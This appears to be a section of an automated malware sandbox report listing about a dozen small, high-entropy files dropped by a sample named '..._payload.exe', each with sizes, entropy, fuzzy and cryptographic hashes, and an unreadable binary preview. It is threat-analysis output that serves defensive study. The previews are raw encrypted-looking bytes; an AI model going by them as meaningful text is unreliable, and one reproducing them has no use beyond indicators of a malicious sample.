                                                                                                Preview:.<?...cc#Q.~R=.x.....j.)8.....4.... (.4b.a...`._.....(......:.9.....\1.`...4..c.....;vk.i..,.......$...M....(\...N>W..,.....i.V..iSGc;+.SsN0a...:...)......iF.T.3,.qM..+d......4D)$<....7.g!..../....C$....t...}...}vrQ.6...(~'Z...........Bdb.p...IK...`S|.l....T4|.~b.7.....+.O.d.E '..D...;JJ...i..7...8....|2....-..2...)[9.J"...#...Y.@O5.X...c.-.T.h....i.F..KI.a....S?....=P....+...W#.`.Z.s.U`./8"...........s!.0./.....B...RE.K.?.....Xs.,.|(...#&..VY.......pd..`..'}.?..Og..|?.hZ..(S;... .3...8.m_3.-r..G.C..w...s5mg....../....oV.....U..U.r......3.N...J.E.w.e...z..@.Kk+.J.........n.P.1..Q'...J.....>...7@E......7V.&...z#M..Q..m ..u@...y.w.Cv..*>}........7.r....v.D...KDc........4.g.v....+=..i...Uu...CV..9.D..W,.3(f..-.]..Utg...N..w..s..M..S.s......>.S...R?....).:q..A..M\7;|.T....t2vZ.....1....(._p.i.r.i.h.J......6.{-..DJ....[*[T.+...|{.dH.........!..%C.U...z.2J.P>-.`u.JS...........^V.x.Y......e.Yv..&C?1.XY.f...h..C.E.wpG..........0My..uP.E?....7..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1733
                                                                                                Entropy (8bit):7.86620682783099
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:FzVQTVPF3ya9W/fcoeviGa46jEvQT/P0/cxa9JLD:FZUVd3v+3QitjVjGcxa99
                                                                                                MD5:38151E336646327988C6E0F33D8EEC3A
                                                                                                SHA1:CB9B0E96C2CFC6EFF5D8253C201A2D064D1AFD2F
                                                                                                SHA-256:C5E57C9B77EEF10D8C3D50A0DF84B93ABDD220DBC76D8402624578F9363B5BD1
                                                                                                SHA-512:A08F8EE0BD27D17D97637F66C9AC221E613001534CE8A42079F2801E8007D6E7C957AF2F7CBC99CAE892A7F368D1243F9A666257CC18A3460BE748A09DBCFD4C
                                                                                                Malicious:false
                                                                                                Preview:.<?..;...iy...].1..2Q...m...4:........U..:D........+..?D......&e. .Y...@...../>........`..)..W.=...8....f."..)-..m..Ri.|...~.\h?}L...W...8..\...............E.g...M>..v...Z.".j....^....Y..].T(...F.......;....!......Ud..L..[4^.].g.Y[..R._..BH.s.}..x..a..KG.M..L...u.?P...P_.....t..9.B&.k......[...\Y..........-^w.l..8KIa@UB$@...din..N.mZ9..._v..-_..F.x|...:r.1...&HjS.{.._.hP.>.|4F..I....me/.|8..-.....^....r....5....;....6..`...x..>d.*......KJ.|...M...X2a.^.[.A{..+.....Z3......G..\......}Zv.rW..6<.{Jk'....."w"...>l .E...b.T.{u....5.{%.qD..'.~.a...y.....,j)p.[....v(:!..J.\...6....UE..re.u.hX...<&A.Q.C),6..%,.OB..K..HN..E^.k.....I....X}..;.^p........K.:..8..rw.e.C...vrZ...'}y*..[..=-&j...uyy~..'{..{F..=>.BnWj.HK..!..F.=..Q.1..?.i .@...K{.$R.p.Y>..2...........(uY i\....-].,8.*.......d..HrW.....i....r..G.K.h.T.BT.C.m...p..........^.@D..........vl......} .65!i..TfIbvU....==-.....&..p..3Li/..a.v..O.TN"7.....K.....{.sVN=|.-M<m..|$+.....!..V}3i.....p.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1706
                                                                                                Entropy (8bit):7.88200091044854
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:5y3pBL0M1k/uzsbLw7lYxMJUR9MXd3iDqLD:5yQ/W+LwrxSm
                                                                                                MD5:2F16550F17990BACF8AE28C1B3F27F40
                                                                                                SHA1:137C1D48A0735462EF296CBF92F5CA18C1542616
                                                                                                SHA-256:C1BA00DAC6EB8050D48032BAC86E04053CAE66E358ED9FF395812F281EBEB079
                                                                                                SHA-512:687793E4690B8384F17197C529B2D92BDDC5EF9B13BC2FC89A2FDB5E00ADD97822048544E9213972738EB2E2A87D1B19C6EDB53EF2792873422FF706B6D76002
                                                                                                Malicious:false
                                                                                                Preview:.<?..>.a.r.S..!F..{.E..:,A....&.,...d..O.u.T...,...1..h.*.........X.t.0-.1.u.)............C%.Q..(.z.Q.$.K~:.b.......W.v9.........(!.8l..._..K...i.i..O...p.u.gRD..$.!.?D...K:'%...-.H.I...b..iiSi.f..jO...U...@...?.8!.._!...r..h..Y...r`s...xu..m.....:....`|.g./R..;.....G......o..U`.YG.Qo.L:.1.:.G..|..{x.x.vT.m.v...Q....8..w.....-.1...@s_'.....a..`w.K1KpC...-w..:..v.. .i.........>..#8......s....D\h......Q#.i.M.....}.MSB..9wx..8.zh5.],..E.+..!]C1g;]x....x.?...'&.\W....d...>..D..^._+.."Bt....Sp.o....?(.........uH.i.,6.......m...Go..P..9..U.q.......V2r."...8#$*ikK.....3k..>..@]..Nn.W6 2..5c..d.X...0=K.&H(3g..y......TgO.....c.@L.....z.2........2..N...!.x..~.?.n.S..F....i.........u-.V...I.....A....z[..I.......D..x......,.A.0.e.....<.emE........j.]....F....I1J..2Bi..J.:.WGv....[.V..T.aZ.M=......R../H@.R_P.z...}':........v....M6.M..;.I`^%.<...{.x....~.RWn"...V.Y...L.mp|.I#.......s.#._.. ..{..+..;..z.c>.bR...1P..w..tOO1&.....{.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1743
                                                                                                Entropy (8bit):7.879541965723919
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:PcCzyxp8aHqWPb+bc0axvZeW68v8QlELWteoNBZ7LD:kz8MPb+bpoN68ELWtXNH
                                                                                                MD5:74E95B19180141724EB5DB1A3BC8F9B7
                                                                                                SHA1:A55C3F8B48951F14ED0D84B457A0AE29180F485F
                                                                                                SHA-256:F64B310D2B709F4D611241BCD99DFA2C0E688F02867D0FE77B288EDCBABA7A1E
                                                                                                SHA-512:DA461E623238253C5CEC956D87F4AFE03F895C176AE89390AC8252BBDDA1057EFACE01B050EC5B8568BE467F6C73C0105A27F3A76435DA53CA59A5F532C44BE5
                                                                                                Malicious:false
                                                                                                Preview:.<?q.`.........".Evv..............J.._......@-.i...ab...L.I.)h..j..[.....2m.i$....%4...c..7.=k\...*)..:...b..Y]..!3tH0m....~..b.u.G.D...I..KTy..}.i....j$..d..h....Q4.m.t...;.C...G;,.*..b.8.WX...e.R.....797.........D.(...t...{...&]..;.....V.k0...&|.....Fw1#i6...W.9]xv...Y....j_.X.....8......d.y...V._1..z.}.......L..$_.N...rp...r...V.....Y`TK..-p...=.L.".Rs`...C.. .....iq.._OHY&.}...L..\8.j...g...U.,..-..=...yX...I0.{.y..........6`.fY......C.79.&. .........P.E...z4CZ..q.......w..\....E.Q..VH....bZ.Z..[:8.US..x.A.q=J+.u6.}p..|....m=.?8u.~p..z....Y.IA...N..||...$..Mr0. \.{z..........,3PCf<c.m58..v...U.(r.OZ5......p..7.X#>{..z2........nHM......$...>.2.....C.E.bg[.b\=.x.[p....y.#..BU...P.vt..$/.z..A..D`.q.I;..Lb.[.g.m8pw{WvS+c....8..n...5..e.;2p+_.%aF%....H.'.M....}..YO....j..c..'....G]}h...^....A.#iJ0....e.\.f..8^.q+@..g..w..U~..`../.<.Fa.Z.....04..:.g5.+.L./e.".t~w7S...D...:.j.G.`bE....v.I[..V..S.c.....p>..Bl...^85Gc.<.....W.b..@).
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1692
                                                                                                Entropy (8bit):7.876786494386082
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ne3cDw66rC+zhuhigcu+U0hHXH4C5QmLD:scDw9rCzhigcbb59
                                                                                                MD5:960C3C38C63378338B9DACC2E949B11A
                                                                                                SHA1:6AE08D09E02952186DC39AFD934FDBE065743916
                                                                                                SHA-256:48F2C0676B470789C5A899AF53CD45D67AB22C08E05FD182AA70C1E750555A1B
                                                                                                SHA-512:1AA86E403A0ED279A7519F3407614674ACABE7891FC30B9FB29708D179C9757C76525B65D710292B6BF964D32EF1438684F6ADC0AF09F1684459238032150E5C
                                                                                                Malicious:false
                                                                                                Preview:.<?#..$..p.{X.L..}G.9D...d.o...?KK.......n...r.W.....\...r.{0F....j].k.U.....B.^..K.w>...CZy.."v.....2&o..g.R.P.=.....#..Q<...;:.8w...K..R1XN..P............q..a.D..:|hB.,;......#....p.I....._~...?.?.qx..`8..V...<....Oh..Zf..ex....:.....B..aW..........Z...O.U..<...M.tuD.Pu.}}..*E(....(.?....E..2(#..... ..a.?..qQ....pK..].j..$'...6..u.n..((..h.....0zt.w.....i2E...X..B.-...}7qD....N../?....*6..'..;Ld.v.x..:.r.&7r.....@;T..."..aJ.Ib3.r.....3.....`Z...P..<2.s..(Y....I...Fs..x...4.U.>.Z./......^7..x..F...ue...i..z..O|qX6&..I.g,......A...]........r.J.......pL.)......+^....<3p......1.e.6.....a[... .^.5.....V.Qn.Nrt.."{..6Y.!B...w.sI..AFGj9.R.;h.\.Q..;QS.."..b.5.n.....b..:v../B.u. .9d:.M...@...(.4.^!.....U.O..........3.....|;..R%.X.O......t.kp"~.3}.(.YO....B..D...h.....-..=.-.j.....b.>W.>S..:.I.............4'.uN.............R..kz.ZMO<..aeo...v.`....Fm..*J....<jk.A.H..4.Y....(... ...)...*|..t......"P.......swR..b..4.......=..`pb.=...!.h.q
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1729
                                                                                                Entropy (8bit):7.884153051543883
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:QejoByK/i+TUz82DbJjgiEETfxQ6uIBwgnwLD:RcV/i+TUz82PqiEYx1l1k
                                                                                                MD5:CA81F00EC4669419B2615A0EA3A2AC21
                                                                                                SHA1:B1DA09D6E04959460555F85F460E1CAFF90A9AD6
                                                                                                SHA-256:49E4B1D905A8359AB815A6A86D0F0368F58CD46BB6A008B681286EEB143F112B
                                                                                                SHA-512:F53DDA518C606F624172E16BEAD216ACB76DB93E81F77635FF896B5069FAC258C4B35EF8BE9B7DBDCC8BC737850F69F7A52FF377C00A306ED62183D896A513B5
                                                                                                Malicious:false
                                                                                                Preview:.<?*$T.....C..:.s.q)....edcV.V.4o.@.J.....l8.4..I="`.90..\.Yw...\..Kd.,f._..I.7.~.xb]..\.n.j.:h$.e..Z.....K-..[0%kPLX..u.x."W..}..9R..Cw.9.:0Z.....`..c.1.l..j.9.+...R.......M...^.0h...j&1....[.../F.T..T....?#zX......W|.i..n....v,...~.w.M....@.@.l..b;.I.WVY.)a....`...q.+.p.......f.\.....R.....-Y..v...b.....Z q..<9....^......^.."<.H...0D....ra..NE....Xr8.0....Bd..Vx.*z...I.@....W..../{_..j...E".`.*......u.lC.qR((<..;.{0..-....$.r......V/F.o.i....Y.....v...K.=.+...d9M.n.{.E...@0...s.-...5.....H$u..-....`..".)G... .J.o=..`.^\.Yb*...n...]x.h.Tox.."...........;s!py..e.%.>..v...91..m...(w....X.2&...e.`v^.../.....+.D.3'..c......EZHSJ.S|.k......t..S.<..`........[.y...L9p=.s.c...y.fIt..........-...^:~....8<..M..p...;o..%..E?.D....)..U.....y{.y.O`...U.{......0..M....Fam...>....Tm.6.?m...%[.Z0.......$z.W..>.......G.(.....i.4....k..B........~.|.3.[.v.5..gU....:.+.^J..F@e.J....o.Y....S}.|6L.......t......B3R.....hi.1s..j.}......|.X.. .I.Z..V.A/."...e.e.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1694
                                                                                                Entropy (8bit):7.85035095900153
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:gw+I8nvZGILh+UfGGQ6dGpCYHQGHXSHNvAW2ebVvUbXI7RSSGY7LK/4BN3AW3Hgl:gw+fh3Gl6dTScNpJvwXIVSeC/gALLD
                                                                                                MD5:E94FB48214FC4BB865BC4C9958FDDFFC
                                                                                                SHA1:FF1A138D42D75DF85EFE445D3B2AE14F0A5D34C1
                                                                                                SHA-256:E84936ADD5B1784D78ED636F9420CF7642E587C53D47A0D3686E7632668EFEC8
                                                                                                SHA-512:16ADE2328E062BAC5CE8114E1DFFE438806A9376AA0917FE717A7AD1C58464EF06CECAEA7D624B8147BA623598203A69ED70FF79AB724EBFE01035AB6F151BDE
                                                                                                Malicious:false
                                                                                                Preview:.<?(.3{..}.0..b. .g.j.....\89.?3.........N.U9U.YQ.............c.e._....'4...m.S.b.K%..v....:..Y.......S.k..U...Wm..;.........Mjp$.~X..V$.0.~.......2+6....Z..\s.".Tx....Y.,........ ...x..[F.7.n.F...!N.7X3.5&r..W..Qw.*H...A...V.D'.....`6...v.=t..,.3f.Q.O. .....4.n..Q.k.xQ{j4.........n.....t..0...v.....ks......7+.o.=. X...KS...0k47..m.QPh.....C.d4.G..0.P....g.r.&2.t`RB.C.On....0.`x..V..Ba..%..>..G.RG...z....k.Aj. ..5Y1.....5........:U.W.~....ZG..KUH.).3..k.M..c`...`.]`{.m..x..Hk..]..V!.S....L...j.{$c. .........up.Pd.......Q...@..(...$6.o.4<..Ve..U.}.._...D....kK.!..Y.n..C.$...$~o..E-.].....h.....X.*.p.<.c72nW.l....2...d.W..X..,.21...."....bwJ.X.;.hb.>..4U......\.&D.:....BF.~...i.E..".@....TK..-.....>....F.o....<.M...)..0..p.]...........;.-K......;+...Y(..jmJ1..v.;....xW.t7.4.c.7Q..!....\8}...........x..q.._.....d..U..4s..g.FQ..@U..>b*.U.oY.w..S..D...b...C.........s.p..S.....9Z .bz.bX,...N.....S..x.R....r...L....ZB."C...IW....3..Y.|.%X/.:.<..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1731
                                                                                                Entropy (8bit):7.8813206269509415
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:29QZfwKGt6QmhT4OUdUy3cHAuWo8CRjA1c/9xG/kAVLD:EWGUQ4x6buJ01cFxGT
                                                                                                MD5:2B66AD1070CC4E8DF4727F6537D03603
                                                                                                SHA1:70EE8FECF82F726F59FAD441FF57891A3E792392
                                                                                                SHA-256:F578816232DC8C0590B71CD8FEDE9DF88E5D278B810244FCF6177B348F81AE85
                                                                                                SHA-512:FE78C4B5A83A62E8822EF2CA96C9334054AE5918DC9147B83D1E1E86C49D4C2A876FE54E3A20B94B9587CD37E0C774575B5025BFCDF278F7983460D82792BB5F
                                                                                                Malicious:false
                                                                                                Preview:.<?....y$M..Z..\=..&"...(......a..g.bRD.}..JC...I^..rn..y...})8.#/.?... .O....Q..,.....#.....&..l....R;....D.s.[*...?.@(^.d....=...v.)..l...z.B.)f7...(./..iN..A.~/A....(..B.S.Ps.87e...M)h.t.Z....9...0;#....i.&...5-Q`...8p.8..-..5.M....Q...3.K...+@.._.WyX.f...+k....t..W..{.}.Z|Z(,..B...E@z.r..0.nx....<.......>....C|.......8o....n...b^%..d..~*Y.8..3..^.....Cp..Q.B..k..2c..bc.F....._...\.....cR.>%...q.d+|..<...Y.......B.|'0I.5D^.n..^z)9b. :J.3...bp.m'../N...t./.......;t......HC.(X\..._?.f..PP.z.....w.'.>..I.pM.uB.....q......9&......<w.S........>.,8...cQS3./.....0.Q@c..WDzv..=..d<..?30..">Zw..z...]..Y.'W...$@s.U;..6j|..._.SJC.N.}.8Mv...E.....q.e{.X,.3.T.~1.]....K+..7.q.j.cq.3e..6.& ....B7.g....5pjo.Orh.h.=...Wl....x...%.H.%.....@k..T..:<....z.Xh........O.A.g. dM.,..S4..D.EuiL.w).l.~*'v..L5M...jD`#.!Q....0*....a..+..;t!..`.....'D\....%..s|..w.,/8..@.....[..{.KD.h.....4..<v........ d.7G(-.~RAE.K.N~;.....C.].pM..9...3.B*./........ .]l{....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1712
                                                                                                Entropy (8bit):7.889813394261116
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:/drd1r7uvVIjnAlK3sWHEBXWRBoUhGc6Q2J7qhf/LD:/Jd1/EIMWkBXWRB/hGcF2J7cf
                                                                                                MD5:359C163B95ADE6D0EF3EB3641052F05D
                                                                                                SHA1:53797F54BA509C6B9248EB55CAE236B1CA396DC0
                                                                                                SHA-256:A08BA5EC0EC297DFADD9CC74EEE26A73066E3D7916BE549D442C8BDBDE718841
                                                                                                SHA-512:CAB90E730C3354326BEDE2014B6C1D99D0A5C625B710B6EC135EE41216A088D916A0C09934318EA67868EAC313709893B63D9348827D7438CE9DE4BA4B7A3DAC
                                                                                                Malicious:false
                                                                                                Preview:.<?..L.|......7>E..E...~@w..~...?....p...W....{..<l...j;q.(Usg>....;....h....v...wSki.c#.07..B..>..L..)...p.F.37.6i..".VJ..`.:C........%079....^..`.`i.W];q.W.......{.a...b0.....#..%..K....I.._hW._h....q_!...n}..Z..F...c..3.H?L`.K.....{M.6[...R.....0rW..G[.[............J..G..6yn_Q'.;.ok..a...Y=.PO.>.(.o.2.. u. C..P...fGt.N.5.."..+..W.R..,~B$7....,.."4!N...L..9..S>.S.y?../'....,.G$.e..gx.....;+..m..=.\....#.]./...6".m.5.*...{.1...J.}/.........].-b7...f....!,....z_k.......n..@.+.6Os.A.mr..(...Z[..=...E...G..R..b...a..h....x......r.{.+c.;?..(.}.9'.(,x.?...........a.....n.7.aA..jF..@..B4..A..*(.J.....h".j.HU..z.4.g[.(.2D..E3....?...S .._a...&C)2....\$D..p.-..~......(b...,#...eP....D.....j..C..9W.D....&Dc66.....qp.7...N...5.;..,.YN.x..[Xm..i.e.9T....6...p......+..t..(.....0./..|.........K....g.Tz,......J.q.:........4.l.u.]..T......@.2....".C..y..(.xc..w..;...G..Qt...2:.(..7.J..Ky,O.{.)<`..x....k&.1..\QY.'.v.....C.W..|....g.(......x.@..\.P/..}r}......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1749
                                                                                                Entropy (8bit):7.883795422048713
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:09oApjNUJ0IsimgYZgflpT90v9eD0C4LdLdv+KXIh9ZLD:09oApRiDmgYZgzMKT4Z59Ct
                                                                                                MD5:6A3359273A8F5A4985C3BFC8CECC99BF
                                                                                                SHA1:2A619D3F1E83D15E8D9421198FA8BFA39D81AF93
                                                                                                SHA-256:22AE50E489567D1CBE9E12CFC7452428E1646AE7DA14E75F047CA4579AD2B960
                                                                                                SHA-512:ED21F6B10B3F0FD815055720CDEE2CD1BAE3290DD3DF2CD49D8319881F1D002C2AC715A5D5710193F3BD9B681E60918B695BAF12DA3065C30F0FC94264C48539
                                                                                                Malicious:false
                                                                                                Preview:.<?iS...@".k...p.P.8....f.H<.C2|E....^N.z.U.K.. R.2..Z..]Z3.,. .7......d.^........m98....$...^.S....#..A@....jO-.......tAoup......]=.Lm........--..L.m..l..8s)5...;...p*..a.`}>T...By^.3z....PyK..G..(...q..m".}*znF(........H.R....`.\!.3..\/...<.>_If......7...B..R.`..^}.@n....@..._OH....w..YD......p.@{a..^c.Jw2..b.%.q;......x&.?H.8u/%...[..p....47.....0H..S..7..p....6|....Y.=.....p.9T.LwHp.*Dk[N...E..g......H..2}.K.0..#......?........N...S.e.Z.X.....R..t...Q../".[....v...........>...s...Al..KR....7..S..........x.Y....b`..1.&.3........L.. ..._>M...6..f...X..5..B..h.Brg...]u(..W...|...6.&...mY....F.uI......0.j.n.........>.c....#.......r.YP.E.._.......P..&.K...]C...T.......i..Co.W...+..z.....w.Q6....dmj@|.....9.^].k...........}:...P`@2@..d.....1...6....=9I0..U..o.n...Cv.y~!5.^..Bf>.0.yJK/.tQ..b`G:...D....X...Hq.......|.9...~..K.&.]....EM.(.p..4._5X.x....k...-..0.%.|.2.s.....^.U...W.......\W.0....K]bsB....s.P.uj..xMxJH......A.>.LU.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1734
                                                                                                Entropy (8bit):7.900761506867125
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8YpH+r2Ngc5umPv8LPnH8vQLqpCDY2I7rvLD:8Aezc5zgcLEWL
                                                                                                MD5:E5F0719BB5C4C5EEA8F2D6ED0500E8F1
                                                                                                SHA1:E36114EAF9004347C966785644F4128C4485205D
                                                                                                SHA-256:2FBD2ADACECC4AD3958F6104972EA062C70B1F12A4AE111D6DA2B6EBDA633252
                                                                                                SHA-512:2E3BA78256CE9AD401494F987AB7C994F486B3312CCE07DE6D07EC2466DB83BF15EF045476C218726D1FDAEDF2E890F00DF1EC2BE4817153F403DC5A83D7DA86
                                                                                                Malicious:false
                                                                                                Preview:.<?....<=H\.XzN.. .......6.)..6&./.@..F:E..w.&..9#.v.U;....(......:.a\t...,.@/....U=3.W.+..1......F.h.%0..b.......P.x.({.0..1.zZ.+. .,o....>...../."..n...~..3.p..K......+..i....U..._i5..<.........~....~C.!..^...Zk.a...c........-&...h..a...%....(.s.TG..i..H./.Y4[.m.....Y..e.4._.."....%.2.....Y...b%.).......M..b&a.t.}.cA....~...i......b....j..x...J>o....w....W6..o.....0>....~.....h.$.5..Z.N.X.&]"...G.........Mc.G}8.fy4...........M....Ob.r.j<......D..ci3.*.iq..u.A..&.R....&T...Q.1.wC.4X.Jo.mz._6(....=....X-.W.....Bu_.<)....f....Jn2..;..pR.U..`;..m. ..W.....X.Z.....W.....+. .05s}.....S..kAfAm....Sj.....y...j....JsuiC.^..e."v...l.|(.43...3.K~W.[.`.S.*.L..^..o..\7@../6.O#.U.b....|.^qt|\.... ..T7...C?.H[R....L.4f..qI ........`.:k...+....IKH.F.........H..$-.!l..j...L.<..u'.uZ.${....VcJ.....6NR.%2dH....c..I.<..k..#...MU.z<w.v.X..nr...(.%/*.../-".. 8...-~....Yy.X....N...CP..B.@!.0...........N..q2.xWw*......./|.vr..^$..i.....LZl,$6d"B.&w
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1771
                                                                                                Entropy (8bit):7.881181680125314
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:qa4+/jngP8HERC4oIUWZFR3ZJjvTVwFBThdC4qgmkFqNqBULD:JLg/C43Uor3ZrGBTh5/X8qBw
                                                                                                MD5:9C7DEDF24D6ECD9670195584A75DC6EC
                                                                                                SHA1:AD16D73C8B07D7FDFF17DC5D2C5B445A84CDCC63
                                                                                                SHA-256:1AC82154007B7A84DF3D6C559A854C35F0414DFEADAFDE65E63FCE80BC0D3F7D
                                                                                                SHA-512:84F1746B7D14D171C0F9629515435BCAD215979CA1D0759EC885A1FED8A8255F5F1545DC6CA5021F16790F9B32D65D27045A991F4DF3B005F1861038AC71BDBB
                                                                                                Malicious:false
                                                                                                Preview:.<?..[.o.XE<....?..bEM.[.S:..T.`.<9..*.y'".V..y=..\wZG......Lo..oU$V.}S!..oq..t.H......>...3-.Xlx..{%$.}.v3...$`.;fG...MU.s.F.qn..k..}b(.:u....j....../5.ys$pk...y..2..zq....?v8..X...#h.c.y+.U....i..L..d....n.aU..^.'......a.M.y.J2#.9...k....7.3.8...<...I\ ..#Jr.@,..5.KXn/N..l.$@.0....t....i..#..k}.b..U.;E....aT......x/..c,=.?.|"k....eP..&.k...+./M.C..6.<....C...X?1|$Ao.;B.x.H_..J.\.8.)RH.`....Ijx..\..u:u98..H.h.8o...m0$...guo.u.*.P-.......c.).01....M.x!.?.]j%....o..9.#Z.!.\.h..Eq8B.Y..N.?...../...A......v.5t......f.@.(.(...v'C..e.%.....onD-y..d...."FLK..z.S..y..8..E.f4.....0...D..dK4:..#.....k..{....v>.`...>...Fg.GQe._?..0a....4C....e..,.(.3.aA.......<!.Qo..;......Jv..e...XW.~....u......\..(.=..=$...7.?.9\Z......D..t7!.......,$..D....g.aE....t..p....V.I...k.....M4.W.3..D.h.......7'..E(..'..*..#.v.S....$.....`.k.%..R.mq.....o...O...E.@..>E....Q...a....Jh.C.@..H.j.V.t...^.....Y.a3m......\.. .yZ..Sb...R5.....Z.x...D..k.4...Y.....R..!......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1716
                                                                                                Entropy (8bit):7.891839940774072
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2awZ+AbTOi5hACMyHU4Jl1c2zrIlUciwIv+DLD:2j+aSeX1JlqMEJcQ
                                                                                                MD5:F2A3BE1E45701D52272958C2467C92EC
                                                                                                SHA1:9186D6787E87B917A6C6566A8738E898D0296D1F
                                                                                                SHA-256:E425BBD883BA4DFAAC3241E51E7F41AD5E82AC5E7A710373F16E1B1375AFDD4E
                                                                                                SHA-512:19BFFA409B61D40F108B632A4F10F617D5FFB703538E74F55F598AC5F13EDBF43B48CE92A56A82DB128B0AA7836DE6DC3BF1195296EBF7F114CF2843211B1126
                                                                                                Malicious:false
                                                                                                Preview:.<?e.:....xs.d..Vg.5~.wmPU,4B...4..u........a...uL...S..MEH....<..N}0?Q.Y..^.....M.`H!.R.8..b........`.......^..}V%!....].BdT....J.t`'iU.m.v.(?..k)...RYg...x...xL..*8..........(n5.....K%%L".........Y.~.;..RN.%.u..7.D..Z.Pn.?VyJj,;EUjO=..h.w.J..<.....f..(.+..........m.Tu.|M.../D@.h.... ...xh..@.C2...,WWO,....$...3..!a...gu......9.ziqx.!..V.Cj(..d.3..Z..6..<.c.......4.c.0.`...c.vf5...e..8.WC......G.5.Hq.../. ....c#..N...........J.....t,..`.b.p.....O..[.JK.\f.5.$."W.V.......="=J..'.._......3..pv.VC.....1D.U(B.....Gt..q.2.........7:$.................8.ZgO.............cur.3L.......x6..AZ.x.0.....@.......}.k..-./.q.X.^..Y?...8......T......J..z...&.....#..O.w....yI..D...}.......VI....2a9D..6[p..@s..gz..Gp...X.Z..Id@]..}..5...(..m.x.d..d>.`mUm.\K.g.CG..x.z$...*.,..]...b.#i'S.....O|I.ix.....l`.1af...4..r....<#:......{.~b..n.0/..;(.........|..Y.k..KH}.1<...}......R..;........?...q.......iY..\..7U.{...K,..B.v^z.o.*.0B.....4aTg*..%`.6`.....t.s......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1753
                                                                                                Entropy (8bit):7.886975795405101
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:rbgJXohmnjLRI6ALyo+fUwPoTNg1kGdyUdG1b+doI1CqYEBLD:rbasmZIGfTgCq0TP6I1Cq/
                                                                                                MD5:B8E42AE954573BB8846D2632F1BB5887
                                                                                                SHA1:50A88AB55E2E30AA302A2897C35ACF8E58ABD9DB
                                                                                                SHA-256:6A7A5999263F5788CE831638C976B7B09E978B16C213F6624C14B7E9F4D02AF1
                                                                                                SHA-512:9B1F37DB5859B047B6767808A38A9512C86EF72F0A8C6FE63A0A5DEA9199FE71B6C6504191ADA5567E29514400DE528D60877456B35484E8BF6D8B68C5D293B9
                                                                                                Malicious:false
                                                                                                Preview:.<?.........8K5y..P...jNFS%c..y.....o..q..:y.....b.a...F.y...h$n......n.T....O)..L.r.Q...&......?X.%6..........9{9.:.Y*..,.b.pq...v...u.`...V>b;!.4...<".u..:}..P.....u.._2k.O<.........oms...6..a..8..~...K..,\......^.b..*...1..I-p..$...;_.R...(... ~N.....5H..I.....q..k.h..z..J...)q..H..m:...[...-.kz;..2.k.d..=y._...d.8OjW1..../......Z..E.].).6.m6..j.U|..w*.].ZH..*.....u[.@........>hYeQ.t......m...u...'].Y..................|.!...4.Fd.....g..f-n)....|.n..4..zY~D.m...>{Z...<?.l"......Z........Df.!...;.N...T..8...R...+.5...G....b.Q..*L..(..X.'.9...f.b...z@...~-.L.@.>......-=..f.Q....<.d...Z..~.O.A..#A`..D8...U...6.i03o.@e..6F. XN{.Q.*../.Z#..o..66..s;1.I-..5.I.U...k..T,l.....&?.H.rC..#u.w.g..T}.B...4.z3Lj..Ha...1...IX0r.at......+r..P.k...].....y..s.*.2..*..3..;....f;O...:NZ...D$:.3R{.3L.D...J.?+.^.kjz...>so..rL.V...R....$...b..r.|HM.y"."...'..w.F..62./......#...Q.......t.t2.ex.cT.".....a.~.@;.......{5E...Q"..V.eN./u......C:...i.Y.!>..Q...m.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
